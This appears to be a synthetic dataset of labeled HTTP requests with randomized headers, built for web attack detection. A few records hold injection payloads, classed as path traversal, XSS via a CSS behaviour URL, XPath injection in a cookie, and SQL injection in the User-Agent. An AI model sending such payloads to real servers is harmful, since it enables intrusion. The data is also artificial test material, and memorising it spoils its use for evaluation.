Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=6222
Client-ip: 53.173.252.98
Cookie: iuc=rE
Cookie2: $Version="91"
Date: Wed, 20 Sep 06 10:01:39 GMT
ETag: W/"pwygvxgH9dhSTlIzhxnl"
Expect: 100-continue
From: vteseoi@repl.biz
If-Modified-Since: Sun, 27 Dec 09 12:01:16 GMT
If-Unmodified-Since: Mon, 20 Nov 06 16:17:40 GMT
If-Match: *
If-None-Match: "bdzbmbvL9L.FvmMUHsOG"
If-Range: *
Max-Forwards: 381
MIME-Version: 8.4
Pragma: l=o4
Proxy-Authorization: nmede xeerdo=aetP
Authorization: Digest realm
Range: -6214
Referer: http://celinzsA.net/dobl/r2wk/6iSrtf.php3
TE: deflate,deflate,chunked
Trailer: Pragma
User-Agent: dwbwsnV7eJ http://www.otusib4.uk
UA-CPU: StrongARM
UA-Disp: 1462,2709,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9604x4951
Via: rhaie6/9.7 173.51.227.178
Transfer-Encoding: heail; nsbemrgk=awa1
Upgrade: tlets/6.9, Inu/8.7, zfnnt7/5.8
Warning: 936 www.sdeox.html "ieitess8sehaqekHrEgo" 
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 68664107203
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26858
Start - Id: 17641
class: Valid
GET /tkGUIgAMGIf/h@uf3LUE7w1BqJq/X-tLselectvNlinkachild6/nkFO7ALQUHEOj/JwWt/f7rieeOEadeneahodo/dDknser/xhXqF043zh1Ol4QC..Co/F6Gi4_T5e.php3?Gmtwt9fawta0azt=f3unioncspositionss&aet=ds%28Guojtnuimg%7Etwqdpositionr&hm=nv7DIit&erneutnKi=i&rsrfurhstsemg=c&ie8ataLno=11&mroeooiieytla=1&ismntdo=bhArrtrephbac&1nso9uehg66i=6897&eynaas8iitcgmy=1233&dobrh=9174 HTTP/1.1
Host: 239.27.182.215:75603
Connection: el1tJmda
Accept: */*;q=0.4
Accept-Charset: hz-gb-2312
Accept-Encoding: *;q=0.3
Accept-Language: ono-jicg, ho-eee7ie, 9c-hOlr9;q=0.7, czmetepo-wtl5;q=0.2, aoali-ceho0ish
Cache-Control: max-stale
Client-ip: 138.232.104.112
Cookie: esnepsei00d2a=o=oej;rcphOb7aenuhr0D=loehtpassashrqst>t;r7tniAgosy9d=pAa3oEbe;Cthrjhxoitdx=tU0FG
Cookie2: $Version="1"
Date: Sat, 07 Jan 06 12:44:26 CET
ETag: W/"m-5o4nd@km0@ZNeF6"
Expect: 100-continue
From: spzl@sWeElsewt.de
If-Modified-Since: Mon, 21 Mar 05 08:20:23 CET
If-Unmodified-Since: Sun, 18 Nov 07 22:14:10 GMT
If-Match: *
If-None-Match: "-bF5_QG8BIKVLM3jsO.n"
If-Range: Sun, 25 Nov 07 03:20:42 GMT
Max-Forwards: 8176
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM YXBsZ2N0Z0RuYjFzbnRvUmd0YXJsbnQ4dHN0cnNodHVXZXQwZWVpZWV1aWQ=
Authorization: Digest nonce
Range: 3-7,-050092
Referer: /idaw4tW/oybdeo/ixFazr.pl
TE: chunked;q=0.1
Trailer: Accept-Encoding
User-Agent: a8tytsotf
UA-CPU: Sparc
UA-Disp: 004,3622,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 519x8664
Via: 8.9 253.57.72.181, 5.8 www.t2iisofm.jpeg, 3.9 42.62.13.246:445
Transfer-Encoding: identity
Upgrade: tlNe/2.8, mgiaa/3.5
Warning: 768 www.lonce.jpg:6617 "rDn7td" "Mon, 09 Feb 09 19:00:46 GMT"
X-Forwarded-For: 9.161.93.196
X-Serial-Number: 6572400
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 17641
Start - Id: 9396
class: Valid
GET /vv8hVdocument4@Et/VgdSek-/rihc0eyeeeRso44ee/diXt7gR/tMhome17dOqEF/3gPysH@fH@O5YQPSAj./2yZ/roq/9tIeei1rniyemohoj0nh.html?et=784786928&enwah5ywa0ee=856&KlsgYnullfH4=0a-&teibTat=lsXUJJ0pPS HTTP/1.1
Host: www.u7c3.biz
Connection: keep-alive
Accept: */*
Accept-Charset: hz-gb-2312
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.3
Cache-Control: min-fresh=4
Client-ip: 50.16.85.193
Cookie: tss=8d1r;ar6sse5dir=773010;aajeteien=gtseaor9;w3amcihorrdbiae=0847;lNIga=ukytAZPyVY;efo=hosce&4
Cookie2: $Version="524"
Date: Sun, 06 Jul 08 24:57:27 CET
ETag: "rL6DyzDqGZ.Tym0P"
Expect: BaEl
From: sspvni@sliueDto.cz
If-Modified-Since: Wed, 10 Jan 07 20:50:43 UTC
If-Unmodified-Since: Wed, 09 Feb 05 06:26:41 UTC
If-Match: *
If-None-Match: "5txE6u-czb9pLxQ96Yg"
If-Range: Sun, 17 Jul 05 21:47:53 GMT
Max-Forwards: 723
MIME-Version: 9.5
Pragma: o='k'
Proxy-Authorization: OdcSix ayHxs=easseTwo
Authorization: Basic cmFIYXN5OmlndG01aWFy
Range: -33681
Referer: /hLs7/sdjtrteo.pdf
TE: chunked,trailers,gzip;q=0.1
Trailer: Transfer-Encoding
User-Agent: 8ZIIVY9 http://www.tidrt.uk
UA-CPU: Sparc
UA-Disp: 849,768,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9764x9599
Via: FTP/2.7 53.154.9.229
Transfer-Encoding: compress
Upgrade: n1s/5.5, lmwiso/3.8, Tal9/6.5, E6Ia/4.3
Warning: 141 www.einoanl.htm:6 "nnnhSshhuitzceoekrhE" 
X-Forwarded-For: 89.84.41.1
X-Serial-Number: 320269879204
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9396
Start - Id: 30204
class: Valid
GET /sxYshdANW7Vaop.2Yx2U/KR@vbscript3F8script4/mTXZKFbx.png?r1azndr4=vittstjl&OtEncZvr7d=ey82ULGNVM7&wdmitirio=58313&1r7rtc0dgeds=34442&nilenoqPqCue=at&niarnfnea8=0&uhtiilea=45565889&Solo8dttE5=Cf3shutdownnA&cJinsertK=jr2JfB&6SOxd=eIzlezliTre HTTP/1.1
Host: www.0cAxoaB8oA.net
Connection: zisdhOgn
Accept: video/*, image/gif;q=0.5, audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: aadcc-aLL;q=0.7, en-detd5fr6;q=0.9, m-ni9i, rsieSin-onssFn
Cache-Control: no-store
Client-ip: 52.71.28.255
Cookie: Htyidheen=21202;ulnves3e4eBaenr=0790;ac=e%eI;Ap8uh=878195086
Cookie2: $Version="87"
Date: Sat, 24 Oct 09 09:01:28 GMT
ETag: W/"pEVT4gUmHZeSWZfTeULy"
Expect: gCiaud=uaseai;Iittoha
From: wieAim@aawfi.fr
If-Modified-Since: Sun, 08 Jun 08 01:15:39 CET
If-Unmodified-Since: Wed, 06 May 09 19:13:18 GMT
If-Match: "4ZNcta5xZL2ExP@"
If-None-Match: *
If-Range: Fri, 19 Mar 04 20:38:18 CET
Max-Forwards: 42
MIME-Version: 4.6
Pragma: hn8t7npn='iee'
Proxy-Authorization: Digest realm
Authorization: NTLM Ykh5b2M3c2FlaWR3aGV6dG5oZXNoaWllaWVFb3MzbWV0MDlvT2NqYWlvaWhlcg==
Range: 941-1883,-90
Referer: /MFq1/oit3oog/xnxhttoo.bin
TE: trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/0.1 (X11; U; Unix 6.5; 5e-hh; rv:0.5.2) Gecko/91532413
UA-CPU: x86
UA-Disp: 058,5611,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8300x7095
Via: FTP/8.1 12.107.211.9, fif/8.0 www.6o1e.js, 0.5 www.npsy4kte.tiff
Transfer-Encoding: gzip
Upgrade: vaqi/6.0, imptmk/3.4, ear/5.0, Ees/0.5, sye/5.0
Warning: 602 32.88.153.167:23729 "hrge" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 19194011026
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30204
Start - Id: 6970
class: Valid
PUT /J1eiaa5xenrdgttece/lBAB92qW3g8oloMj/sore/issnatooebaUo5e5m/uEtfcti/9GJ5xtermksW/otvtuaplr9D/XD.L.vbscriptPEZhwhereEVD/oJ0ljQYENoV3RQ4XBJr/hx2nuanurnneopCek/rttncrHldljt.cfm? HTTP/1.0
Content-Length: 62
Content-Language: Yohteeo,mrd
Content-Encoding: deflate
Content-Location: /ipttaieu/0getrSeN.ace
Content-MD5: b3NoZTRyNGtobnUxdHN0bw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 31 Oct 06 11:02:34 GMT
Last-Modified: Mon, 26 Apr 10 03:37:07 CET
Host: 128.165.137.163
Connection: seIseoe
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.8, deflate, gzip;q=0.9, identity;q=0.7
Accept-Language: *
Cache-Control: max-stale
Client-ip: 167.207.19.9
Cookie: ecrntamha=HHAi n;etck=iSbi;4QGsMWV_=r2shevdtvLhyeer;oany=24;soee=lT99vB1H
Cookie2: $Version="82"
Date: Thu, 17 Dec 09 01:43:00 CET
ETag: W/"NL_m1mDqJIQByLH"
Expect: 100-continue
From: coetw@Dezgd.biz
If-Modified-Since: Tue, 15 Apr 08 02:50:25 GMT
If-Unmodified-Since: Sat, 25 Sep 04 08:15:43 CET
If-Match: *
If-None-Match: "Svv7u0Q7E7sAFCud4fc"
If-Range: Thu, 10 Dec 09 06:29:24 UTC
Max-Forwards: 1
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: ohuy zdAs0=tni26a
Range: -35,310954-4,-65030
Referer: /Ctwzop/peOspaO/ei8cn/R1Et/eeaEr.gif
TE: chunked;q=0.5,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/1.4 (compatible; MSIE 4.4; Linux i386; ratyeh6nie)
UA-CPU: 68000
UA-Disp: 535,687,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 040x289
Via: HTTP/6.6 72.94.77.138, 1iRd/3.4 62.245.135.30
Transfer-Encoding: gzip
Upgrade: liht/2.7, eelehi/2.3
Warning: 295 140.22.217.163 "uv2fUxytlf3rEnqh" "Sun, 03 Jun 07 20:15:54 GMT"
X-Forwarded-For: 5.129.82.226
X-Serial-Number: 95729667
----: -----------------------------
~~~~~: ~~~~~~~~~~~

npositionEQXPILo=m&aihhwezne=bqrv&T7kXl=pr&lfsromi7vf26t=55200

End - Id: 6970
Start - Id: 26032
class: Valid
GET /tspeti/uu7DFeceFFpbg8Qz/7oroloix/XAynzEs/crpEM8/r9/adWBmTaaunn5ancous/nmEysde9hueper/51easneasahqAftpulnh/iHrl.js?nkzsYoetibitl=yJw5U5C&rvnhoffH=52356172&Tshjt8=w%25+%27+ne%7Eksoi HTTP/1.0
Host: 95.35.116.47
Connection: keep-alive
Accept: image/jpeg;q=0.2, text/*;q=0.7
Accept-Charset: x-mac-greek, iso-2022-kr
Accept-Encoding: *
Accept-Language: rukP-ofr, nr-5hisa;q=0.1, nnurs-cr, f0i-cdtido2s
Cache-Control: only-if-cached
Client-ip: 34.105.255.188
Cookie: iobn=jkcrotiwhrusnl
Cookie2: $Version="7"
Date: Tue, 19 Feb 08 13:12:37 GMT
ETag: "Eg.pWzKSXLWr4MxHZf"
Expect: 100-continue
From: 3seat2ct@Cn4ntSeii.com
If-Modified-Since: Tue, 06 Feb 07 21:45:22 CET
If-Unmodified-Since: Sun, 20 Sep 09 23:57:52 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 28 Aug 07 21:42:55 GMT
Max-Forwards: 2681
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic bmJPbWVvc2g6Y2VXbjVvNw==
Authorization: Basic b3Rlb2Uyajp5VHVhYWhNcg==
Range: -7
Referer: /d5lfa6.nsf
TE: deflate
Trailer: Warning
User-Agent: ies8 (splLfqEmd; hPPK_FZd; nCwQt7; xZdC8CD; ry84bCp)
UA-CPU: x86
UA-Disp: 4002,120,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4161x5305
Via: 6.2 www.t7rhl.htm:17023
Transfer-Encoding: compress
Upgrade: lr6nji/0.6, no2fo6/1.2
Warning: 936 www.ab27.html "s2azr0" 
X-Forwarded-For: 212.160.180.28
X-Serial-Number: 6743288486222977
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26032
Start - Id: 22694
class: Valid
GET /iFWmE2PT2dr3l2hpV0/soesRA/ISoscriptRnl/jJ/yhg.php4?Yg3RLUWSSs=ryeTliai9Ae2t&rDBFZ4VA0dYdiv=txVlKr&WRtCdu-lJ4m=oY%40w&aeegWrtotm=%3Dctsc&execQe0B18@T=e6tmarAiancgiobspn&a5=046&nptuci6dsroo=60&tn=rresrnexUtoseiiaen&pi4si=v&N.ydocument=odX&8i=85 HTTP/1.0
Host: 237.254.13.99
Connection: close
Accept: */*
Accept-Charset: koi8-r;q=0.4, windows-1252, x-mac-greek, ks_c_5601-1987;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=07
Client-ip: 170.118.70.133
Cookie: 7hn4=jle tr9ebse
Cookie2: $Version="4"
Date: Fri, 13 May 05 24:45:53 CET
ETag: "7w4H6wWgRTm61cR5I2oz"
Expect: 100-continue
From: ohhR@ti5t.uk
If-Modified-Since: Mon, 27 Sep 04 19:22:34 CET
If-Unmodified-Since: Sun, 04 Jan 04 04:55:02 CET
If-Match: *
If-None-Match: "19L0B.3m1JVhaWY7K"
If-Range: Wed, 14 Oct 09 23:14:03 CET
Max-Forwards: 44
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="fi2ns"
Authorization: Basic VHNzbzpseW5zdTVy
Range: -20,5-1
Referer: http://x1bstpmd.uk/euha3ee/ach0ri/ke7nn.dll
TE: deflate,deflate;q=0.6,trailers
Trailer: Max-Forwards
User-Agent: fCV@jzJXd http://www.Tmwt.de
UA-CPU: x86
UA-Disp: 949,175,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0084x738
Via: 8.2 www.tcstonv.jpeg
Transfer-Encoding: c2Isd; a9ar=L7ep
Upgrade: 1echoa/9.2, m3ak/1.2, iermmo/3.2
Warning: 339 www.8cxlJeOf.htm "y9hruhNaeio8rni" 
X-Forwarded-For: 57.171.74.241
X-Serial-Number: 12701556330524195
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22694
Start - Id: 20708
class: Valid
GET /b6TfztfDdiaqi/lN/imHumt8jis/jnoshdh/Yy/dbmrcsaeezehncmedC.png? HTTP/1.0
Host: 74.78.195.151:80
Connection: close
Accept: text/*;q=0.8, text/*;q=0.9, audio/*
Accept-Charset: iso-8859-15, iso-8859-4, windows-1257
Accept-Encoding: *;q=0.5
Accept-Language: x4tL-nwfmucn;q=0.1
Cache-Control: no-transform
Client-ip: 203.12.122.191
Cookie: rE=700531;lmeasze3tsgma=adeTethnrreknitaI;.jkt8=687496
Cookie2: $Version="512"
Date: Mon, 13 Oct 08 09:40:09 CET
ETag: "7T6Fhzz0UC38LaOaY"
Expect: cgaczg=nthws
From: Eenieeb@jtsh.ch
If-Modified-Since: Sat, 28 Nov 09 05:04:48 UTC
If-Unmodified-Since: Sat, 11 Sep 04 10:28:16 UTC
If-Match: "wIjLty5wg2.8bTrHC-Xx"
If-None-Match: "yhPGv75G3VDfj83D5"
If-Range: Thu, 18 Oct 07 16:20:18 GMT
Max-Forwards: 0
MIME-Version: 6.4
Pragma: n='eetn0'
Proxy-Authorization: Basic aE9Jbm06N2FOcmVlbg==
Authorization: Digest cnonce="aeatzele"
Range: 15-,71-,5-
Referer: /hoUe/beranm1e/ei4f5tta/dehew/foH4.tiff
TE: chunked;q=0.0
Trailer: Accept-Charset
User-Agent: kTta8 (voM-VwPCb; dZColhEY; s6mC0fNp)
UA-CPU: MIPS
UA-Disp: 031,1343,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 413x553
Via: 2.3 www.mypes.html
Transfer-Encoding: gzip
Upgrade: OtSal/2.6, ete/2.1, oHfg/3.7, dMshA/4.9, hnrpor/3.2
Warning: 078 4.18.109.190 "qceetbhebMca6" "Wed, 01 Aug 07 08:37:44 CET"
X-Forwarded-For: 255.159.77.194
X-Serial-Number: 43053635016402500046
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20708
Start - Id: 44921
class: PathTransversal
GET /Yfiouafftc4twTtdoelv/oqBSlM3t4lYaGihKyX/e7vservicesz6vh8/f6aveaheo3sNe2cil1r9.msf?ed=eyu&cNgidothaeeis=1&ge=27222023&uEe6nmhrh=28642&stoTaef=.%2F..%2F.%2F..%2F.%2F..%2F.%2F..%2F&iis3rai3ts=23&am7wh3nhek9=pecHaiReEo5eq&oishrntn=fuAt&tF=82359911&etwe9ps3U=-ro%2Ft&II3YaNVuYN=onHdt2uirs70 HTTP/1.1
Host: 227.188.105.153
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: ii-tb, srtmsuR-nua2htdt, 3moe-rlp7w, e-43p;q=0.6, cExsadoi-Fieil
Cache-Control: no-transform
Client-ip: 156.228.249.233
Cookie: HkncoTaynpt=Dphps;y7X3RxtermBm7QZ=5;iaceerNasovac=nodpsfnooe
Cookie2: $Version="12"
Date: Sun, 28 Oct 07 19:13:51 CET
ETag: "AzUyxAgJDBVdz5P"
Expect: r1deaen
From: erlpd29@hbwsenumTc.de
If-Modified-Since: Sat, 29 Dec 07 09:28:00 CET
If-Unmodified-Since: Sat, 05 Feb 05 12:21:21 GMT
If-Match: "bYmRxm3JoHIIpH8Cv3"
If-None-Match: "6xpfW36nUADdQQF-TaK"
If-Range: Wed, 10 Oct 07 04:32:06 UTC
Max-Forwards: 1994
MIME-Version: 6.2
Pragma: tudElp1=sa6oeFe
Proxy-Authorization: Digest response="98F2FadAed0C8DFfeDEa1A54Dbbba32e"
Authorization: Basic ZU5pcDpibmVzcA==
Range: 50635-77
Referer: http://www.dmpan.gov/nlsoo/ipdd/fjIu/lrheelel.gz
TE: chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/0.2 (Windows; U; WinNT 6.9; E8-Fq; rv:7.8.8) Gecko/32990825
UA-CPU: StrongARM
UA-Disp: 714,744,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0076x7912
Via: 5.9 www.hhequr.tiff, 4.9 126.126.41.176, 7.1 www.ststy.tiff
Transfer-Encoding: deflate
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 640 197.125.93.67 "pyiaiihnet7qbt" "Wed, 01 Apr 09 17:31:52 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44921
Start - Id: 47438
class: XSS
GET /cnr.aspx?74ens=%3Cdiv+++style%3D++%22+++behaviour%3A++++url%28%5Bhttp%3A%2F%2Fwww.si.com%2Fscript%2Fiecra9i7w.nsf%5D%29%3B+++++%22+++%3E&jaaarqSho=It76httpschge5zsa&jiou=ainxI7se+%3Do&1fudehoke=sr1tftpohrEmhs%3Eeh+indj&ntTal9snsYcehGe=%3De HTTP/1.0
Host: 173.15.163.205
Connection: close
Accept: image/*
Accept-Charset: gb2312;q=0.6, utf-7, ks_c_5601-1987, x-mac-icelandic;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 184.190.224.215
Cookie: NoAaauraecjS=5home;nang=849;tandDoa=cFaa;6Qtwgrenvr4rlyt=qd iionreaesbgsoundtiglrlocation;toozsaao=8414179
Cookie2: $Version="05"
Date: Tue, 17 Mar 09 22:37:57 UTC
ETag: W/"USbOQLZFotY12CP"
Expect: 100-continue
From: desfe5rt@owenslwi5e.org
If-Modified-Since: Sat, 07 Apr 07 17:33:18 GMT
If-Unmodified-Since: Tue, 10 Feb 09 14:23:35 GMT
If-Match: "cr9wjUcukfFuJApk9"
If-None-Match: *
If-Range: Fri, 19 Jun 09 18:29:02 UTC
Max-Forwards: 3
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest nonce
Range: 13744-31405
Referer: http://www.ccen1t.com/ukhbawk.msf
TE: chunked;q=0.3,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/7.0 (Machintosh; U; PPC 1.0; oa-np; rv:6.6.0) Gecko/25191011
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 644x740
Via: 3.6 www.5orevyr.png:07, 4.9 www.urHyuh.htm, 5.6 117.197.231.210
Transfer-Encoding: neR6
Upgrade: ipodo/1.3, Abos/3.0, rwucs/0.4, xtsw4a/6.8
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 168.182.251.139
X-Serial-Number: 31680375275
----: ----------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 47438
Start - Id: 50093
class: XPathInjection
POST /cFp.5yj5/LefexecOn@_gdL6/eIItzUtHM/aZHV.xLdOwnu/rpeel/7eihcejtaemz3xzate.swf? HTTP/1.1
Content-Length: 131
Content-Language: o3si4eel,mtsre,Aofes
Content-Encoding: compress
Content-Location: http://oaao.cz/tnrTliT/whnTe/ewthgsos.pl
Content-MD5: b3NpeGU5aTFhNHRBcmF1bQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 27 Apr 07 16:05:43 UTC
Last-Modified: Sun, 08 Nov 09 16:13:00 CET
Host: www.acuoei.biz
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean, windows-1257;q=0.9, windows-1253, x-mac-hebrew, macintosh
Accept-Encoding: deflate;q=0.8
Accept-Language: *;q=0.4
Cache-Control: no-transform
Cookie: cE6b1te9tX1t=Stbt/h/8/child::node()[   position()=78] |  le/hgrhr/y/child::text()[position()=3] or  'maQ'   =';eoam=e35TTs&grdces
Cookie2: $Version="804"
Date: Fri, 11 Nov 05 18:37:29 UTC
ETag: W/"POC9iz-ARsF-GVZxL."
Expect: 100-continue
From: Nfssn4o@ekenEegup.it
If-Modified-Since: Thu, 05 Aug 04 10:50:46 CET
If-Unmodified-Since: Mon, 13 Jul 09 13:50:59 GMT
If-Match: *
If-None-Match: "58gC2Wb7.7Jyoas6"
If-Range: Tue, 16 Aug 05 18:05:46 UTC
Max-Forwards: 890
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: hhdsot ur67to=rerin
Range: -1,783989-,-5244
Referer: http://www.rayVm.fr/Pdijaf/atdalet/Atoah/ggeetp.wav
TE: chunked,chunked;q=0.1
Trailer: Accept-Language
User-Agent: Mozilla/5.5 (compatible; MSIE 8.8; Mac OS X; ctmm)
UA-OS: Mac OS X
UA-Color: color16
Via: HTTP/2.7 www.anspdr2.css:7066
Transfer-Encoding: deflate
Warning: 518 www.djftoT.js "ZpAetsstneUsezjBhT" 
X-Serial-Number: 1378331
----: -------------------
~~~~~: ~~~~~~~~~~~~

SsyesrOt=eui&qio=(H&ttBtnwb3m=64101155&2wC07Tl8F=i&lzd=826375859&9wrpeeontl=460&eetuusjEc=o6r'arcp&2Z1insertT=cAscldtumstdgicgc

End - Id: 50093
Start - Id: 35077
class: SqlInjection
GET /hWwwfHofBphpi7Qj/mochaaoptYiHt@JZtmpVPq/j5sna2s/mnF/hplCXlkAuV@y7.jpeg? HTTP/1.0
Host: 202.19.95.42
Connection: keep-alive
Accept: */*
Accept-Charset: euc-cn;q=0.0
Accept-Encoding: *
Accept-Language: ss4hrt-pln, esoeao-rm
Cache-Control: only-if-cached
Cookie: y1eiwyqtseaste=odae8essesbodtcn;ona=73;gg=6;ghs6rrTex=fae;nhacKmwnhs=hr9nehaaetaauea;sI=eqdtaA8httpit
Cookie2: $Version="52"
Date: Mon, 28 Aug 06 18:07:35 CET
ETag: "8J.PtOrQ4ynhF_j5"
Expect: 100-continue
From: Icdw@di9ssorE6e.com
If-Modified-Since: Wed, 15 Jul 09 20:08:30 UTC
If-Unmodified-Since: Wed, 03 Sep 08 08:40:00 CET
If-Match: *
If-None-Match: "LgpFe@8qximiuq5"
If-Range: Sat, 09 Jan 10 01:07:12 CET
Max-Forwards: 9161
Pragma: iqHthsb='rcbiu'
Authorization: Basic bHRkc3Mybjc6dEhoaGk=
Range: 8-,02-8893
Referer: http://www.agocT.cz/ae4e77/spws8Thr/edee/ihodian/otNe1a.jpeg
User-Agent: '   OR  'Ltbh72ui'  BETWEEN  'R' AND 'T
UA-CPU: MIPS
UA-Disp: 7830,290,16
UA-OS: Linux
UA-Pixels: 4116x971
Via: HTTP/4.6 47.74.245.129, HTTP/5.8 www.08neRt.gif:189
Transfer-Encoding: compress
X-Serial-Number: 51475
----: -----------------------------------------

null

End - Id: 35077
Start - Id: 9792
class: Valid
GET /pouwMhzXXICB9nF-1/4QGI.from/YRIYtmpB6VJRD/t7TA0jXQ8Q/jy/ppRhsfadcetfe5l4ono/iXKU/IlogV6/WrWwindow.openuEc_vN/ajahe.cgi?k9hF=tjaittiziw&o1rnm9=iZ_8&etenkg=iJSnP&ioneaNo1=cFE3DjPGssT&imgDziohf=Rcixnhtpassesa&uthftsr3aZ=c2aosmtl HTTP/1.1
Host: www.iseocr0a.be:5
Connection: keep-alive
Accept: image/png, text/xml, image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: min-fresh=638
Client-ip: 142.252.165.176
Cookie: tna5l=5709607;eeeccr3jriht=4lp  ;tle:xl letsewp-m;a2l81o78c20bilg=lea;7Dn7fk17S2=5643
Cookie2: $Version="74"
Date: Mon, 06 Nov 06 18:26:40 CET
ETag: "9QcqDrRniCsHj9Thro7"
Expect: i0hpyeh
From: frwpr@Te9h.be
If-Modified-Since: Sun, 26 Feb 06 15:18:57 UTC
If-Unmodified-Since: Wed, 26 Nov 08 07:31:25 CET
If-Match: *
If-None-Match: "Xj0nh9HZZcHG1ev"
If-Range: Wed, 12 May 04 09:08:42 CET
Max-Forwards: 0
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: IsiUr 6twklat=tyei
Authorization: hs0egd 8dpat=abipemla
Range: 32-
Referer: /enxcslse.html
TE: deflate;q=0.1,trailers,trailers
Trailer: Trailer
User-Agent: hesivn0m/8.9
UA-CPU: PowerPC
UA-Disp: 152,310,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 493x9189
Via: FTP/3.4 www.aflRh.js, 6.5 213.188.182.157, FTP/2.0 www.Btfi.html
Transfer-Encoding: identity
Upgrade: jaeNfe/6.3, eitr/9.7, Eia/7.9, ryge/4.3
Warning: 928 www.ocTt.htm:04221 "zlt2ebnora" 
X-Forwarded-For: 215.67.208.226
X-Serial-Number: 3012101828224515543
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9792
Start - Id: 16452
class: Valid
GET /aFLRsyAn33qL1QOa/teV/pq_ehFcvIemmf1nu-/uB09n9/f9WS10p7s.BaIzV.jpeg?nn=783&msg=iaataftttar&Awybetween1O=8291260&RgTFnconnectz=td+ho%5Bphp%24tinclude6%5Bilwstmnprocessing-instruction&UmhavingvwRUf=kflEgmbrbt9i&nfe0hh=okGmr-%40JgD&2tn9hii=h8JnwGc&olh0a=%5Ch5S6mcs%7CAldo&5EeRLQFy7JM=Eo4+flhste&lIisefcyao=3708 HTTP/1.0
Host: 96.11.31.157:485
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: cp-950;q=0.2, windows-1252;q=0.3, cp-932;q=0.3
Accept-Encoding: identity, gzip;q=0.6, compress;q=0.3, identity, compress
Accept-Language: *
Cache-Control: seYuc='dauEcE'
Client-ip: 165.56.112.131
Cookie: itmenlithntqoHo=7829456;hctanhe17nontw=93;utmae=2;phromensotmeTta=iRvP4VYcp
Cookie2: $Version="9"
Date: Fri, 28 Apr 06 21:42:42 GMT
ETag: W/"VhmJ3hFe1CQ3fFu"
Expect: 100-continue
From: htpnou7@zrU4oar.org
If-Modified-Since: Thu, 06 Dec 07 06:10:50 UTC
If-Unmodified-Since: Sun, 12 Apr 09 06:00:26 UTC
If-Match: "hHWy2nKAZcn.0LMlp1l"
If-None-Match: *
If-Range: Sun, 22 Feb 04 17:11:51 CET
Max-Forwards: 539
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Basic dG4wczpzbG9hZw==
Authorization: Digest response="d4EDaEF673D402ce9bedCdEA85e716a4"
Range: -4,1-
Referer: http://www.g1sislet.cz/AinHCe/rulyEei/Lvuf.asmx
TE: deflate;q=0.0
Trailer: Accept
User-Agent: Mozilla/9.1 (compatible; huihjp; Windows NT; eyedt; mO9g)
UA-CPU: StrongARM
UA-Disp: 097,580,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4066x2541
Via: HTTP/8.1 www.yahlrms.png, 3.4 90.110.68.149
Transfer-Encoding: whjy; 6c0dhrn=lnyga
Upgrade: hrts/1.5, ocenff/3.9, hafw/0.7, whsmet/4.1
Warning: 398 www.bi0vAerr.tiff:59 "o6sDp9ta" "Sun, 19 Jun 05 14:33:21 UTC"
